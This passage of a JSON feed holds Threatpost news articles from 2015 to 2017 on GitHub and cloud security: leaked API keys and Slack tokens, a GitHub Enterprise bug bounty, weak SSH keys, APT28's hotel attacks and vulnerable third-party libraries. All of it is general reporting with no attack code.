othree._](<https://www.flickr.com/photos/othree/>)\n", "cvss3": {}, "published": "2015-01-13T12:55:07", "type": "threatpost", "title": "Gitrob Combs Github Repositories for Secret Company Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-16T13:26:31", "id": "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "href": "https://threatpost.com/gitrob-combs-github-repositories-for-secret-company-data/110380/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:19", "description": "When it comes to cloud computing, APIs more or less drive everything, but in the eyes of some researchers, existing security controls around them haven\u2019t kept pace.\n\nWhile individual components of a system can be secure, when that system gets deployed in the cloud it can often become insecure \u2013 and get worse at scale, according to Erik Peterson, a cloud technology researcher with Veracode. Peterson, who also refers to himself as a Cloud Security Weapons Manufacturer, described the \u2018Emergent Insecurity\u2019 of the cloud in a talk Wednesday at the Source Conference in Boston.\n\nEarly on in his presentation, Peterson recounted a [Chris Hoff](<https://twitter.com/Beaker>) quote that he claims sums up the concept: \u201cIf your security sucks now, you\u2019ll be pleasantly surprised by the lack of change when you move to cloud.\u201d\n\nIn particular Peterson warned about the dangers associated with API credential exposure, something which could easily lead to apps being rigged to spread malware, cloud infrastructure adapted for use in a Bitcoin mining operation, additional attacks being launched, and the most critical: the downloading of sensitive customer data.\n\n\u201cAPI access is the new equivalent to physical access,\u201d Peterson said, \u201cIf someone compromises your most sensitive API credential, it doesn\u2019t matter.\u201d\n\nAPI keys, which protect cloud metadata \u2013 information that usually includes Amazon Web Services (AWS) access credentials, and startup scripts \u2013 can often be the only thing standing between users and total compromise, he stressed.\n\nPeterson, who\u2019s researched cloud and architect solutions in AWS since 2009, warned that old, vintage software vulnerabilities can easily be leveraged for compromise.\n\nHe\u2019s seen it all: Server-side request forgery vulnerabilities, XML external entity vulnerabilities, command injection vulnerabilities, unintended proxy or intermediary vulnerabilities. Each one can lead to the unintended exposure of metadata, but when they all come together, it can result in a full stack hack, or what Peterson likens to \u201cdeath by 1,000 cuts.\u201d\n\nFor instance, he claims, if an attacker gained access to an API key they could escalate privileges. If they gained access to cloud DNS, it could reveal the private IP of the web server. If an attacker got access to an IP address, they could uncover an app that hasn\u2019t been tested. Once in, it\u2019s possible an attacker could do the worst, Peterson claims, clone the database for quiet extraction.\n\n\u201cLots of people are shuffling cloud data and not thinking of the flaws,\u201d Peterson said, \u201cthey all lead to exposing that user data, all that great info my system needs to startup.\u201d\n\nThere are ways to prevent a full stack hack, mainly through encryption, but common sense doesn\u2019t hurt either.\n\n\u201cNo more checking your API keys into GitHub,\u201d Peterson advised.\n\nAttackers often scour the service looking to exploit vulnerabilities and access cloud metadata API. Storing sensitive information like API keys there can be a quick lesson in futility. That still doesn\u2019t stop users from doing it though; a cursory search on the service for \u201cSECRET_ACCESS_KEY\u201d last year yielded 7,500 placeholder results, Peterson said.\n\nOne developer discovered 140 servers running on his Amazon Web Services account [last year](<https://it.slashdot.org/story/15/01/02/2342228/bots-scanning-github-to-steal-amazon-ec2-keys>) after a bot scanning GitHub sniffed out his Amazon Elastic Compute Cloud (EC2) keys.\n\nDevelopers should get off the old EC2 classic and lockdown their Simple Storage Service (S3) buckets, Peterson said Wednesday. If they aren\u2019t already, developers should log everything, especially API activity, he said, adding that some AWS tools, like [Cloudtrail](<https://aws.amazon.com/cloudtrail/>), which records AWS API calls, and [Netflix\u2019s Security Monkey](<https://threatpost.com/netflix-open-source-security-tools-solve-range-of-challenges/107931/>), which can be used to monitor and analyze AWS configurations, can be invaluable.\n\nInstead of trying to control change, developers should react to change, rethink their threat model and realize that lower priority software vulnerabilities, like SSRF, or XXE, can still be deadly, Peterson said.\n\n\u201cIf you have a key that an app is using ask yourself: What\u2019s the worst thing that could happen if it was compromised?\u201d Peterson asked aloud, \u201cIs there a path that leads to my entire environment getting deleted by some unknown entity?\u201d\n", "cvss3": {}, "published": "2016-05-19T14:20:22", "type": "threatpost", "title": "Protecting Cloud APIs Critical to Mitigating Total Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-19T18:20:22", "id": "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "href": "https://threatpost.com/protecting-cloud-apis-critical-to-mitigating-total-compromise/118197/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:56", "description": "GitHub recently awarded $18,000 to a researcher after he came across a bug in its GitHub Enterprise management console that could have resulted in remote code execution.\n\nThe company patched the vulnerability at the end of January, but news of the flaw didn\u2019t surface until this week when GitHub and Markus Fenske, a German independent pen-tester [disclosed it](<http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html>).\n\nGitHub Enterprise is an on-premises version of GitHub.com that can be used to deploy a GitHub service on their organization\u2019s local network. The vulnerability is a combination of two bugs, Fenske told Threatpost Thursday.\n\nOne problem stems from the fact that a static value was being used to cryptographically sign the Ruby on Rails session secret for the console. The secret value is supposed to be a randomly generated per-machine value used to sign the cookie, not a static value.\n\nGitHub acknowledged on Tuesday that the static secret was only supposed to be used for testing and development, but \u201can unrelated change of file permissions prevented the intended (and randomly generated) session secret from being used.\u201d\n\n\u201cFor testing purposes they replaced it with a static value and forgot to change it back,\u201d Fenske told Threatpost. In the production environment, there was a mechanism that should have replaced it with a random value. But it did not work.\u201d\n\nWhile GitHub shouldn\u2019t have been using a static secret to sign cookies that hold session data, the other problem, Fenske says, is that session data could be serialized with Marshal. [Marshal](<https://ruby-doc.org/core-2.2.2/Marshal.html>), a library that converts collections of Ruby objects into a byte stream, has a method, .load, that can return the result of converted serialized data.\n\nAs Fenske points out, [documentation](<https://ruby-doc.org/core-2.2.0/Marshal.html#method-c-load>) around Marshal.load says to \u201cnever pass untrusted data (including user supplied input) to this method,\u201d but that\u2019s what GitHub was doing.\n\nBy knowing the secret, an attacker could have forged a cookie, deserialized by Marshal.load, and tricked GitHub into running whatever code they wanted.\n\n\u201cBecause the secret is known, you can create a valid signature and pass arbitrary data to Marshal.load, which then leads to remote code execution,\u201d Fenske said.\n\nFenske says that while he sells sugar wax for hair removal by day\u2013[seriously](<https://www.bodypil.de/ueber-uns.html>)\u2013he hacks stuff by night. He founded an IT security consulting firm, Exablue, last month which he plans to use to carry out audits, pen-testing, and \u201cthe whole range\u201d going forward. He said he was inspired to poke around GitHub Enterprise after he stumbled upon a blogpost by Taiwanese hacker Orange Tsai about [a SQL injection](<http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html>) he found in the platform.\n\n\u201cAbout two minutes after decoding the source and opening the first file (config.ru) of the first application (the management interface), I noticed the vulnerability,\u201d Fenske said.\n\nGitHub fixed the vulnerability on Jan. 31 when it pushed out GitHub Enterprise 2.8.7. Now the service defaults to a randomly generated session secret if the initially configured session secret is not found.\n\nIt was a fairly quick turnaround for the company; the patch came only five days after Fenske reported the issue and earned him $10,000, the highest reward the company gives out through its bug bounty program, and [a spot in its Hall of Fame](<https://bounty.github.com/researchers/iblue.html>).\n\n\u200b\u201dWorking with GitHub is really nice,\u201d Fenske said, \u201cFor a company that big, their speed is amazing.\u201d\n\nThe researcher had no idea when he submitted the bug, however, that the company was in the middle of a promotional bug bounty period. The company [announced the promotion](<https://github.com/blog/2302-bug-bounty-anniversary-promotion-bigger-bounties-in-january-and-february>), which stretched from January to February, to celebrate the third anniversary of its [bug bounty program](<https://bounty.github.com/#rules>) with HackerOne.\n\nAfter he sent a draft of his disclosure to the company this week, Fenske discovered his bug was severe enough to fetch an additional $8,000 bounty and [second place in the contest](<https://github.com/blog/2332-bug-bounty-third-anniversary-wrap-up>).\n\n\u201cI was just writing my article and sent GitHub a draft to look at, and the answer came within minutes, telling me that I can publish whatever I like and that they gave me more money,\u201dhe said, \u201cI did not know about that extra contest and was very pleasantly surprised.\u201d\n\nFenske\u2019s bug was one of three GitHub fixed in its Enterprise product to qualify for additional bug bounty money. The company also fixed two separate SAML authentication bypass bugs in the service.\n\nFenske said the latest release of GitHub Enterprise uses a secret that\u2019s 16 random bytes written in hex.\n\n\u201cI quickly calculated that cracking it will take about 469142742208 gigayears on a 8-GPU instance (for comparison: The Sun will be gone in 7.7 gigayears). I think it\u2019s secure now.\u201d\n", "cvss3": {}, "published": "2017-03-17T09:00:04", "type": "threatpost", "title": "GitHub Code Execution Bug Fetches $18,000 Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-03-16T23:38:35", "id": "THREATPOST:E984089A4842B564B374B807AF915A44", "href": "https://threatpost.com/github-code-execution-bug-fetches-18000-bounty/124378/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:25", "description": "Popular collaboration and communication firm Slack rushed to plugged a security hole in its platform Thursday that was leaking some of its users\u2019 private chats and files for anyone to access.\n\nSlack, a leading tool used by companies to communicate internally, was alerted by security firm Detectify Labs who discovered Slack users were unwittingly sharing sensitive company information on the dev site GitHub.\n\nGitHub, another popular service used by the developer community to collaborate on projects, was unknowingly hosting hundreds of Slack bots that contained API information (or Slack tokens) that unintentionally gave third parties access to private Slack networks and data stored on them.\n\nSlack bots are created by companies to be used on their private Slack platform. They can serve either silly or serious purposes. For example, a Slack bot could be programmed to reboot servers by a user who simply types the request \u201cSlack bot, please reboot server\u201d. Another Slack bot request might be \u201cWhat\u2019s the weather for tomorrow?\u201d\n\nOver the years, thousands of Slack bots have been created by companies to carry out these conversational instructions. Hundreds of those developers decided to share their Slack bot programming code on sites such as GitHub. The idea is, other developers might want to reuse a useful Slack bot or modify the code so the Slack bot can do something new.\n\n\u201cThese developers were proud of their creation. They wanted to share their hard work with the rest of the developer community,\u201d said Rickard Carlsson, CEO of Detectify in an interview with Threatpost.\n\nThat\u2019s where developers ran into trouble. Unbeknownst to the developers sharing their Slack bots with GitHub was the fact they were also uploading their company\u2019s unique API key or token inside the Slack bot code. That meant a third-party could remove the Slack token and use it to hack into the Slack account of the person who originally created it.\n\nWhen Detectify searched for Slack tokens left behind on GitHub it discovered that those tokens could be used to access chats, files and private message data shared among Slack developer teams.\n\nAffected, Carlsson told Threatpost, were tokens belonging to individual users but also Fortune 500 companies, payment providers, multiple internet service providers and health care providers. In one case, Detectify reported it stumbled upon everything from \u201crenowned advertising agencies that want to show what they are doing internally. University classes at some of the world\u2019s best-known schools. Newspapers sharing their bots as part of stories.\u201d\n\nIn a [blog post outlining its discovery](<https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/>) Thursday, Detectify wrote, \u201cIn the worst case scenario, these tokens can leak production database credentials, source code, files with passwords and highly sensitive information.\u201d Detectify said it discovered the flaw earlier this month.\n\nAt first, Slack acknowledged the problem, but reminded researchers at Detectify that it\u2019s the users\u2019 responsibility to not share tokens and remove them when they are no longer needed. Slack has since updated its positions on tokens, telling Detectify \u201cWe\u2019re proactively looking for tokens ourselves now, and reaching out to customers to let them know when we\u2019ve disabled tokens and where we found them. We\u2019ll deactivate these in the next batch.\u201d\n\nSlack\u2019s email sent to its customers explaining the situation can be read online [via Detectify\u2019s website](<https://labs.detectify.com/wp-content/uploads/2016/04/Screen-Shot-2016-04-28-at-14.53.38.png>). In it the company said it would seeking out tokens it believed companies did not want to share intentionally, and deactivating them. \u201cTo help protect your team\u2019s information, we\u2019re taking the precautionary step of permanently disabling the affected tokens on your behalf,\u201d it wrote.\n\nIn a separate statement made to press Slack stated: \u201cSlack is clear and specific that tokens should be treated just like passwords. We warn developers when they generate a token never to share it with other users or applications. Our customers\u2019 security is of paramount importance to us, and we will continue to improve our documentation and communications to ensure that this message is urgently expressed.\u201d\n\nDetectify\u2019s last piece of advice: \u201cNever commit credentials inside code. Ever.\u201d\n", "cvss3": {}, "published": "2016-04-30T07:25:42", "type": "threatpost", "title": "Slack Plugs Token Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-03T13:46:42", "id": "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "href": "https://threatpost.com/slack-plugs-token-security-hole/117750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "The U.S. Army has released to open source an internal forensics analysis framework that the Army Research Lab has been using for some time.\n\nThe framework, known as Dshell, is a Python tool that runs on Linux and its designed to help analysts investigate compromises within their environments. The goal in open sourcing the framework is to encourage outside developers and analysts to develop and contribute their own modules, based on their experiences.\n\n\u201cOutside of government there are a wide variety of cyber threats that are similar to what we face here at ARL,\u201d William Glodek, Network Security branch chief at the Army Research Laboratory, said in a [statement](<http://www.army.mil/article/141734>).\n\n\u201cDshell can help facilitate the transition of knowledge and understanding to our partners in academia and industry who face the same problems.\u201d\n\nThe Dshell framework is available on [GitHub](<https://github.com/USArmyResearchLab/Dshell>), and Glodek said in his statement that he hopes that users in private industry and the academic community will find the framework useful and be able to contribute their own modules and help expand the framework\u2019s functionality.\n\n\u201cThe success of Dshell so far has been dependent on a limited group of motivated individuals within government. By next year it should be representative of a much larger group with much more diverse backgrounds to analyze cyber attacks that are common to us all,\u201d Glodek said.\n\nThe release of Dshell comes shortly after [Cisco released its own OpenSOC security analytics framework](<https://threatpost.com/cisco-releases-security-analytics-framework-to-open-source/109415>) on [GitHub](<https://opensoc.github.io/>) in November. That framework is designed specifically for large network environments and provides some anomaly detection and incident forensics capabilities.\n\n\u201cOpenSOC is a Big Data security analytics framework designed to consume and monitor network traffic and machine exhaust data of a data center. OpenSOC is extensible and is designed to work at a massive scale,\u201d the OpenSOC documentation says.\n", "cvss3": {}, "published": "2015-01-30T10:59:44", "type": "threatpost", "title": "Army Research Lab Releases Dshell Forensics Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-02-03T21:08:15", "id": "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "href": "https://threatpost.com/army-research-lab-releases-dshell-forensics-framework/110766/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:56:47", "description": "An audit of the SSH keys associated with more than a million GitHub accounts shows that some users have weak, easily factorable keys and many more are using keys that are still vulnerable to the Debian OpenSSL bug disclosed seven years ago.\n\nThe public SSH keys that users associate with their GitHub account are visible to other users, a feature that enables users to share those keys with others. Last December researcher Ben Cox decided to collect as many of those keys as he could and see what he could find out about them. He began the project on Dec. 27 and by Jan. 9 he had collected more than 1.3 million SSH keys.\n\n\u201cI took a stab at this in 2013 but found that too many people didn\u2019t use GitHub in SSH mode and thus had no keys set. This time however (with a new program that used the events api) I found that the majority of active users had some SSH keys in there,\u201d Cox said in a blog [post](<https://blog.benjojo.co.uk/post/auditing-github-users-keys>) detailing the project.\n\nAfter collecting the keys, Cox began analyzing them. One of the things he looked at was the strength of the key, and he discovered that seven of the keys in his set were just 512 bits, and two others were 256 bits. Those key lengths are short enough to be in the range of factorization on many modern machines.\n\n\u201c512 bit keys have been known to be factorable in less than 3 days. The main example of this is the Texas Instruments calculator firmware signing key that was broken, allowing the modding community to upload any firmware that they wanted,\u201d Cox said.\n\n\u201cI tried on my own to make a 256 bit key and factor it, and the process took less than 25 minutes from having the public SSH key to the factoring of primes (on a subpar processer by today\u2019s standards, and then a few more minutes to transform those back into a SSH key that I could log into systems with. This risk isn\u2019t only real if someone had gathered together top of the line mathematicians or supercomputers worth of power, the 256 bit key I factored was factored on a i5-2400 in 25 mins.\u201d\n\nThe bigger issue, however, is that Cox found what he calls a \u201cvery large amount\u201d of SSH keys in the set that were vulnerable to the [Debian OpenSSL bug](<https://lists.debian.org/debian-security-announce/2008/msg00152.html>) from 2008. That vulnerability existed in certain versions of Debian and resulted from the fact that the OpenSSL random number generator included in those versions was predictable. That means that cryptographic keys generated with vulnerable versions could be guessable. The bug affected SSH keys, VPN keys, and DNSSEC keys, among others.\n\nCox compared the list of keys he had gleaned from GitHub to a list of keys affected by the Debian flaw and found that some of the accounts using vulnerable keys had access to some large and sensitive GitHub repositories. Some of those repositories include Yandex, the Russian search provider, Spotify, the cryptographic libraries for Python, and Python\u2019s core.\n\nCox disclosed the problem to GitHub in early March and the vulnerable keys were revoked on May 5. The other weak and low-quality keys he discovered were revoked on June 1.\n", "cvss3": {}, "published": "2015-06-03T07:37:04", "type": "threatpost", "title": "Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-06-04T15:34:07", "id": "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "href": "https://threatpost.com/audit-of-github-ssh-keys-finds-many-still-vulnerable-to-old-debian-bug/113117/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:16", "description": "Russian-speaking cyberespionage group APT28, also known as Sofacy, is believed to be behind a series of attacks last month against travelers staying in hotels in Europe and the Middle East. APT28 notably used the NSA hacking tool EternalBlue as part of its scheme to steal credentials from business travelers, according to a [report](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) released Friday by security firm FireEye.\n\nOne of the goals of the attack is to trick guests to download a malicious document masquerading as a hotel reservation form that, if opened and macros are enabled, installs a dropper file that ultimately downloads malware called Gamefish. Gamefish establishes a foothold in targeted systems as a way to install the open source tool called Responder, according to FireEye.\n\n\u201cOnce inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks,\u201d wrote authors of the report Lindsay Smith and Benjamin Read, both researchers with FireEye\u2019s cyber espionage team.\n\n\u201cTo spread through the hospitality company\u2019s network, APT28 used a version of the EternalBlue SMB exploit. This was combined with the heavy use of py2exe to compile Python scripts. This is the first time we have seen APT28 incorporate this exploit into their intrusions,\u201d researchers said.\n\nFireEye said APT28\u2019s objective was to steal credentials from business travelers using hotel Wi-Fi networks, which the researchers said they did not observe. FireEye does cite a 2016 hotel attack by APT28 with a similar modus operandi. In that incident, a hotel guest\u2019s username and password were stolen while they used the Wi-Fi network. Within 12 hours the victim\u2019s business network was compromised by someone using their credentials.\n\nOnce the foothold is established in the hotel\u2019s wi-fi system, hackers deployed the Responder tool in order to facilitate NetBIOS Name Service (NBT-NS) poisoning. \u201cThis technique listens for NBT-NS (UDP/137) broadcasts from victim computers attempting to connect to network resources. Once received, Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine,\u201d researchers said.\n\nThat username and hashed password from hotel guests is cracked offline and later used to escalate privileges in the victim\u2019s network, according to FireEye.\n\nIn all, hotels in seven European countries and one Middle Eastern country were targeted. \u201cBusiness and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad,\u201d researchers wrote.\n\nAPT28, or Sofacy, is the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) related to U.S. election hacks. In a report [released earlier this week](<https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/>), Kaspersky Lab said the group has adopted new macro techniques and continued to find new targets such as the French political party.\n\n\u201cThese incidents show a novel infection vector being used by APT28. The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges,\u201d FireEye wrote. \u201cPublicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible.\u201d\n", "cvss3": {}, "published": "2017-08-12T08:00:32", "type": "threatpost", "title": "APT28 Using EternalBlue to Attack Hotels in Europe, Middle East", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-08-12T11:12:17", "id": "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "href": "https://threatpost.com/apt28-using-eternalblue-to-attack-hotels-in-europe-middle-east/127419/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Almost a year to the day since [Github announced its bug bounty program](<http://threatpost.com/github-launches-bug-bounty-program/103974>), the Git repository said yesterday that it will double its maximum payout to $10,000.\n\nBen Toews, a GitHub staffer, said yesterday that since the launch of the GitHub Security Bug Bounty, 73 previously unknown vulnerabilities have been patched.\n\n\u201cOf 1,920 submissions in the past year, 869 warranted further review, helping us to identify and fix vulnerabilities fitting nine of the OWASP top 10 vulnerability classifications,\u201d Toews said in a post to the GitHub blog. He added that GitHub has paid out $50,100 in bounties to 33 different researchers reporting 57 medium- to high-risk security issues.\n\n\u201cWe saw some incredibly involved and creative vulnerabilities reported,\u201d Toews said.\n\nGitHub pays bounties for verifiable bugs in the GitHub API, GitHub Gist, and the GitHub.com website. Until yesterday, rewards ranged from $100 to $5,000 in each [open bounty](<https://bounty.github.com/index.html#open-bounties>). The API, for example, exposes a lot of the website\u2019s functionality and data so it was a priority. The Gist is a GitHub code-sharing product built on Ruby on Rails and other open source components; bounties here vary depending on certain factors, GitHub said. As for the website, bounties there too depend on different factors and risks.\n\nBug bounties are an efficient and economical way for under-resourced organizations to expose applications to researchers who can help identify and fix potentially critical security vulnerabilities. Larger organizations such as [Facebook have prominent in-house bounties](<http://threatpost.com/facebook-bug-bounty-submissions-dramatically-increase/105235>). Facebook\u2019s, for example, paid out $1.5 million in 2013 with submissions growing almost 250 percent year over year.\n\nOthers are taking advantage of [bug bounty platforms offered by providers](<http://threatpost.com/crowdsourcing-finding-its-security-sweet-spot/106848>) such as BugCrowd and HackerOne. In these cases, providers essentially crowdsource vulnerability discovery and management. A self-contained community hammers away at applications on these respective platforms and earn bounties for bugs that meet certain criteria.\n\n> Git Hub will double its maximum bug bounty payout to $10,000\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgithub-doubles-down-on-maximum-bug-bounty-payouts%2F110730%2F&text=Git+Hub+will+double+its+maximum+bug+bounty+payout+to+%2410%2C000>)\n\nGitHub\u2019s Toews pointed out one of GitHub\u2019s top bug submitters, Aleksandr Dobkin, who found a troubling cross-site scripting flaw that when combined with a zero day in Google\u2019s Chrome browser achieved a bypass of GitHub\u2019s content security policy.\n\nGitHub maintains a [leaderboard](<https://bounty.github.com/index.html>) of its top bug hunters. The system requires that researchers who find vulnerabilities in a GitHub property not disclose it before a patch has been released and implemented. Researchers are also not allowed to use automated scanners against GitHub, or access another user\u2019s account as part of the program.\n\nToews said vulnerabilities can be submitted [here](<https://bounty.github.com/submit-a-vulnerability.html>), and should also be accompanied by proper documentation that will allow GitHub to reproduce the vulnerability.\n", "cvss3": {}, "published": "2015-01-29T11:21:40", "type": "threatpost", "title": "GitHub Doubles Maximum Bug Bounty Payouts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-30T20:11:49", "id": "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "href": "https://threatpost.com/github-doubles-down-on-maximum-bug-bounty-payouts/110730/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:19", "description": "The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. It\u2019s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off approach with the code they host.\n\nThis scenario allows attackers to target one overlooked component flaw used in millions of applications instead of focusing on a single application security vulnerability. The real-world consequences have been demonstrated in the past few years with the [Heartbleed](<https://threatpost.com/openssl-fixes-tls-vulnerability/105300/>) vulnerability in OpenSSL, [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) in GNU Bash, and a deserialization vulnerability exploited in a recent high-profile attack against the [San Francisco Municipal Transportation Agency](<https://threatpost.com/hackers-make-new-claim-in-san-francisco-transit-ransomware-attack/122138/>). These are three instances where developers reuse libraries and frameworks that contain unpatched flaws in production applications.\n\nSecurity researchers at Veracode estimate that 97 percent of Java applications it tested included at least one component with at least one known software vulnerability. \u201cThe problem isn\u2019t limited to Java and isn\u2019t just tied to obscure projects,\u201d said Tim Jarrett senior director of security, Veracode. \u201cPick your programming language.\u201d Gartner, meanwhile, estimates that by 2020, [99 percent of vulnerabilities](<http://www.gartner.com/smarterwithgartner/top-10-security-predictions-2016/>) exploited will be ones known by security and IT professionals for at least one year.\n\n**Code Reuse Saves Time, Invites Bugs**\n\nAccording to security experts, the problem is two-fold. On one hand, developers use reliable code that at a later date is found to have a vulnerability. Second, insecure code is used by a developer who doesn\u2019t exercise due diligence on the software libraries used in their project.\n\n\u201cThey\u2019ve heard the warnings and know the dangers, but for many developers open source and third-party components can be a double-edge sword \u2013 saving time but opening the door to bugs,\u201d said Derek Weeks, vice president and DevOps advocate at Sonatype.\n\n[![sonatype](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232110/sonatype-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232110/sonatype.png>)In an analysis of 25,000 applications, Sonatype found that seven percent of components had at least one security defect tied to the use of an insecure software component.\n\nRepositories GitHub, Bitbucket, Python Package Index and NuGet Gallery are essential tools helping developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Java application developers, for example, rely on pre-existing frameworks to handle encryption, visual elements and libraries for handling data.\n\n\u201cSoftware is no longer written from scratch,\u201d Weeks said. \u201cNo matter how new and unique the application, 80 percent of the code used in a software application relies on third-party libraries or components.\u201d\n\nHe said enterprises are more reliant on the software supply chain than ever before. But he says many of the go-to open-source repositories that make up that supply chain are not vetted libraries of reliable code. Rather, they are warehouses with a varying percentage of outdated projects with security issues.\n\nAccording to an analysis of Sonatype\u2019s own Central Repository in 2015, developers had made 31 billion download requests of open source and third-party software components, compared to 17 billion requests the year before. And when Sonatype analyzed its own code library, it found 6.1 percent of code downloaded from its Central Repository had a known security defect.\n\nWeeks says Sonatype\u2019s is doing better than other repositories that offer no tools, no guidance and no red flags to prevent developers from using frameworks with faulty code. \u201cThere is no Good Housekeeping Seal of Approval for third-party code.\u201d\n\n\u201cFaulty code can easily spawn more problems down the road for developers,\u201d said Stephen Breen, a principal consultant at NTT Com Security. \u201cEven when development teams have the best intentions, it\u2019s easy for developers working under tight deadlines to not properly vet the third-party code used in their software.\u201d\n\nBreen said when insecure code is unknowingly used to build a component within a software program, problems snowball when that component is used inside other larger components. One example of vulnerable third-party code reused repeatedly is a deserialization flaw in Apache Commons Collections (commons-collections-3.2.1.jar) \u2013 first reported in 2015 and patched in November of the same year.\n\n[![threatpost_veracode_top_java_vulns](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232053/Threatpost_Veracode_Top_Java_vulns-1024x656.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232053/Threatpost_Veracode_Top_Java_vulns.png>)\n\nSource: Veracode\n\nJarrett found there are still 1,300 instances of the old vulnerable version of the Commons Collections lurking inside Java applications using Spring and Hibernate libraries and hosted across multiple open source code repositories.\n\n\u201cThe developer knows they are picking Spring or Hibernate for their development project. They don\u2019t take it to the next level and realize they are also getting Common Collections,\u201d Jarrett said. \u201cThat Common Collections library is then used by thousands more projects.\u201d\n\n[![apache](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232108/apache-150x150.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232108/apache.png>)According to Veracode, Apache Commons Collections is the sixth-most common component used in Java applications. It found that the unpatched versions of the software was in 25 percent of 300,000 Java applications scanned. Even more challenging for developers is updating those applications that are using the vulnerable version of libraries and frameworks since flaws were patched.\n\n\u201cThink of it like a faulty airbag. Carmakers used those faulty airbags in millions of vehicles. Now it\u2019s the carmaker on the hook to fix the problem, not the airbag maker,\u201d Jarrett said.\n\n**Leaky Apps, Bad Crypto, Injection Flaws Galore**\n\nVeracode said the Apache Common Collection example is the tip of the iceberg. When Veracode examined vulnerabilities tied to insecure code it found application information leakage, where user or application data can be leveraged by an attacker, is the most prevalent type of vulnerability, accounting for 72 percent of third-party code flaws. Second are cryptographic issues representing 65 percent of vulnerabilities. That was followed by Carriage Return Line Feed (CRLF) injection flaws and cross site scripting bugs.\n\n[![threatpost_veracode_top_vuln_cats](https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats-1024x400.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats.png>)\n\nSource: Veracode\n\nCompounding the problem is an increased dependency on open-source components used in a wide variety of software products. The federal government is typical. It has an open-source-first policy as do many private companies. Relying on third-party libraries shortens development time and can improve the safety and quality of their software projects, Weeks said.\n\n\u201cNot only does code reuse save time but it also allows developers to be more innovative as they focus on creating new functionality and not writing encryption libraries from scratch,\u201d Weeks said. Done correctly, code reuse is a developer\u2019s godsend, he said.\n\nFor those reasons, security experts say it\u2019s time for the industry to stop and consider where code originates. Sonatype, which markets and sells code verification services, promotes the idea of documenting software\u2019s supply chain with what it calls a \u201csoftware bill of materials.\u201d That way developers can better scrutinize open-source frameworks before and after they are used; making it easier to update those applications that are using vulnerable old versions of libraries.\n\nSonatype said it found one in 16 components it analyzed had a vulnerability that was previously documented, verified and with additional information available on the Internet. \u201cI can\u2019t imagine any other industry where it\u2019s okay that one in 16 parts have known defects.\u201d\n\nThe problem is that among developers there is a mix of denial and ignorance at play. \u201cDevelopers choose component parts, not security,\u201d Weeks said. It should be the other way around.\n\n\u201cIf we are aware of malicious or bad libraries or code, of course we want to warn our users,\u201d said Logan Abbott, president of SourceForge, a software and code repository. \u201cWe scan binaries for vulnerabilities, but we don\u2019t police any of the code we host.\u201d\n\n**Repositories Say: \u2018We\u2019re Just the Host\u2019**\n\nRepositories contacted by Threatpost say their platforms are a resource for developers akin to cloud storage services that allow people to store and share content publicly or privately. They don\u2019t tell users what they can and cannot host with their service.\n\nThey say rooting out bugs in software should be on shoulders of developers \u2013 not repositories. 